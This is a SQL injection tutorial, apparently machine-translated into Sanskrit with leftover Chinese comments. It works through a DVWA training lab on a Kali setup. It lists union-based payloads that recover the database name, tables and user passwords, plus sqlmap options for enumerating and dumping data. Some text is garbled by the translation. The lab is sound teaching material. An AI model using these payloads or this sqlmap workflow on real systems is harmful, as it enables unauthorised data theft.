प्रौद्योगिकी साझेदारी

한어Русский языкEnglishFrançaisIndonesianSanskrit日本語DeutschPortuguêsΕλληνικάespañolItalianoSuomalainenLatina

1. सुरक्षाप्रवेशः

१.१ वर्गीकरणम्

• जालदत्तांशकोशसुरक्षा
• जाल-अनुप्रयोग-सर्वर-सुरक्षा (सञ्चिका-अपलोड्-असुरक्षा, सञ्चिका-समावेश-असुरक्षा)
• जालक्लायन्ट् सुरक्षा (XSS cross-site attack) २.

2. sql इन्जेक्शन

२.१ sql injection इत्यस्य परिचयः

• SQL इन्जेक्शन् सुरक्षासमस्यानां सूचीयां शीर्षस्थाने अस्ति
• SQL इन्जेक्शन आक्रमणं भवति यत् इनपुट् पैरामीटर्स् न फ़िल्टर भवन्ति ततः प्रत्यक्षतया विश्लेषणार्थं SQL स्टेट्मेण्ट् मध्ये स्प्लिस भवन्ति ।
• SQL injection इति एकः आक्रमणप्रविधिः अस्ति या SQL कोडं इनपुट् पैरामीटर्स् मध्ये योजयति तथा च पार्सिंग् तथा निष्पादनार्थं सर्वरं प्रति पारयति ।

२.२ SQL इन्जेक्शन सिद्धान्तः

• आक्रमणकर्त्ता पृष्ठे दुर्भावनापूर्णानि अक्षराणि प्रस्तौति
• सर्वरः प्रदत्तमापदण्डान् न छानति अथवा छाननं अपर्याप्तं भवति ।
• आक्रमणकारिणः दत्तांशकोशात् संवेदनशीलसूचनाः प्राप्तुं splicing sql स्टेट्मेण्ट् इत्यस्य उपयोगं कुर्वन्ति

२.३ sql injection इत्यस्य खतराणि

• डाटाबेस लीक
• उपयोक्तृदत्तांशः अवैधरूपेण क्रीतविक्रयः च अभवत्
• जाल-अनुप्रयोगसुरक्षायाः सम्झौता

२.४ SQL इन्जेक्शन् कार्यान्वयनविधिः

• शास्त्र
  • ज्ञातव्यः : इन्जेक्शन बिन्दु
  • इनपुट्: इन्जेक्शन् कृते SQL सामान्य इन्जेक्शन संयोजन वाक्यविन्यासः
• स्वचालितम् (उपकरणम्) २.
  • साधनम् : इन्जेक्शनबिन्दून् कृते स्कैन् कुर्वन्तु
  • इनपुट् : स्वयमेव वाक्यविन्यासस्य विविधसंयोजनानां प्रयासं कुर्वन्तु

3.पर्यावरणस्य स्थापना

३.१ vmware वर्चुअल् मशीन्

३.१.१ कार्यम्

• वर्चुअल् मशीन सॉफ्टवेयर, भौतिकयन्त्रेषु बहुविधं वर्चुअल् ऑपरेटिंग् सिस्टम् (Linux, windows) संस्थापयितुं सॉफ्टवेयरस्य उपयोगं कर्तुं शक्नुवन्ति
• लक्ष्यड्रोन्, पेनेट्रेन्ट् च VMware सॉफ्टवेयर इत्यनेन चाल्यन्ते
  VMware डाउनलोड ट्युटोरियल

३.२ लक्ष्यं ड्रोन् (परियोजनापर्यावरणस्य उपयोगं कर्तुं शिक्षणम्) २.

परिणाम

• एकं Linux वर्चुअल् मशीन सिस्टम्।
• OWASP लक्ष्य ड्रोन स्थापना पाठ्यक्रम

३.३ प्रवेशयन्त्रम् (sql injection वातावरणे आक्रमणं कर्तुं शिक्षणम्)

परिणाम:

• काली इत्यत्र शतशः साधनानि सन्ति येषां उपयोगः विभिन्नसूचनासुरक्षाकार्येषु यथा प्रवेशपरीक्षणं, सुरक्षासंशोधनं च कर्तुं शक्यते

4. मैनुअल् इन्जेक्शन

४.१ पर्यावरणस्य सज्जता

विवरणम् : ड्रोन जाल अनुप्रयोगस्य माध्यमेन मैनुअल् इन्जेक्शन् अभ्यासं कुर्वन्तु
चरण:

• लक्ष्यं ड्रोन OWASP आरभ्यताम्
  

• ब्राउजर् मार्गेण ड्रोन्-इत्यत्र प्रवेशं कुर्वन्तु

• OWASP-dvwa परियोजनां पश्यन्तु
  

• प्रवेशः
  

• sql इंजेक्शन अनुप्रयोगं चयनं कुर्वन्तु
  

४.२ इन्जेक्शनबिन्दुं ज्ञातव्यम्

नोटः- मुख्यतया एकल उद्धरणं पलायनवर्णं च उपयुज्यताम्, मुख्यतया एकल उद्धरणं च
सिद्धान्तः १.

#后台程序sql语句
select first_name,last_name from users where user_id = '$id';
#输入单引号('),相当于将sql语句闭合，后面就可以使用附加其他逻辑条件了
select first_name,last_name fro users where user_id = ''';
1
2
3
4

४.३ तार्किकं OR

४.४ स्तम्भसङ्ख्या अनुमानं कुरुत

1. संयोगेन

' union select 1,2 #
1

2. तार्किकेन OR

'or 1=1#
1

4.5 दत्तांशकोशाः, सारणीः, स्तम्भाः च प्राप्नुवन्तु

दत्तांशकोशनाम प्राप्नुवन्तु

' union select 1,database()#
1

तालिका प्राप्नुत

' union select table_name,1 from information_schema.tables where table_schema='dvwa' #
1

स्तम्भं प्राप्नुत

' union select column_name,1 from information_schema.columns where table_name='users' #
1

४.६ दत्तांशं प्राप्नुवन्तु

//1. 获取单个字段数据
' union select user,1 from users#

//2. 获取两个字段
' union select user,password from users#
1
2
3
4
5

४.७ कन्कट् कार्यम्

कार्यम् : एकाधिकं स्ट्रिंग् एकस्मिन् स्ट्रिंग् मध्ये स्प्लिस कुर्वन्तु
वाक्य रचना: concat(str1,str2,...)
उदाहरण:

• users table तः user_id, user, password च प्राप्य तानि स्तम्भद्वये प्रदर्शयन्तु

select user_id,concat (user,password) from dvwa,users;
1

• उपयोक्तारं गुप्तशब्दं च एकत्र स्प्लिसीकरणस्य समस्यायाः समाधानं कुर्वन्तु

select user_id,concat('user:',user,' password:',password) from dvwa.users;
1

• बहुक्षेत्राणि प्राप्नुवन्तु

' union select user,concat(first_name,' ',last_name,' ',password) from users#
1

5. स्वचालितं इन्जेक्शनम्

५.१ स्वचालित-इञ्जेक्शनस्य परिचयः

नोटः- स्वचालित-इञ्जेक्शन् इति sql-इञ्जेक्शन-सञ्चालनं पूर्णं कर्तुं मैनुअल्-कार्यस्य स्थाने उपकरणानां उपयोगं निर्दिशति ।
साधनम् : sqlmap

५.२ स्वयमेव पर्यावरणं प्रविष्टं कुर्वन्तु

• ड्रोन् आरभत
• प्रवेशयन्त्रं आरभत

५.३ sqlmap इति

साधनम् : sqlmap

• एकं मुक्तस्रोतप्रवेशपरीक्षणसाधनम्
• SQL इञ्जेक्शन् दुर्बलतानां स्वयमेव अन्वेषणं शोषणं च कृत्वा आँकडाधारसर्वरस्य अधिग्रहणं कुर्वन्तु
  

५.३.१ sqlmap इत्यस्य मूलभूतः उपयोगः

पैरामीटर्

• -u: लक्ष्य url स्कैन कुर्वन्तु
• –batch: स्वयमेव शीघ्रसूचनाः संसाधयन्ति
• –cookie: अतिरिक्तकुकीमापदण्डाः

चरण

• स्कैन इन्जेक्शन बिन्दु
• दत्तांशकोशनाम प्राप्नुवन्तु
• सारणीनाम प्राप्नुत
• क्षेत्रनाम प्राप्नुत
• दत्तांशं पुनः प्राप्तुम्

यतः अस्माकं प्रवेशः आवश्यकः, प्रथमं प्रवेशितपृष्ठस्य कुकी प्राप्नुमः

ततः इन्जेक्शन-बिन्दुस्य स्कैनिङ्गं आरभत

सफल इन्जेक्शन

५.३.२ sqlmap इत्यनेन पुस्तकालयस्य नाम प्राप्यते

– current-db: वर्तमानजालेन उपयुज्यमानं दत्तांशकोशनाम पृच्छन्तु
-D: निर्दिष्टं दत्तांशकोशं प्रयोजयन्तु

संचालन परिणाम : १.

५.३.३ sqlmap इत्यनेन सारणी प्राप्ता

– current-db: निर्दिष्टपुस्तकालयस्य अधः सर्वाणि सारणीनामानि पृच्छन्तु (प्रथमं पुस्तकालयनाम निर्दिष्टुं -D इत्यस्य उपयोगः आवश्यकः)
-T: सारणी निर्दिशतु

संचालन परिणाम : १.

५.३.४ sqlmap इत्यनेन स्तम्भाः प्राप्यन्ते

– columns: निर्दिष्टसारणीयाः अधः सर्वाणि क्षेत्राणि पृच्छन्तु (प्रथमं सारणीनाम निर्दिष्टुं -T इत्यस्य उपयोगः आवश्यकः)
-C: क्षेत्रनाम निर्दिशन्तु

संचालन परिणाम : १.

५.३.५ sqlmap दत्तांशं प्राप्नोति

–dump: दत्तांशं डाउनलोड् कुर्वन्तु

संचालन परिणाम : १.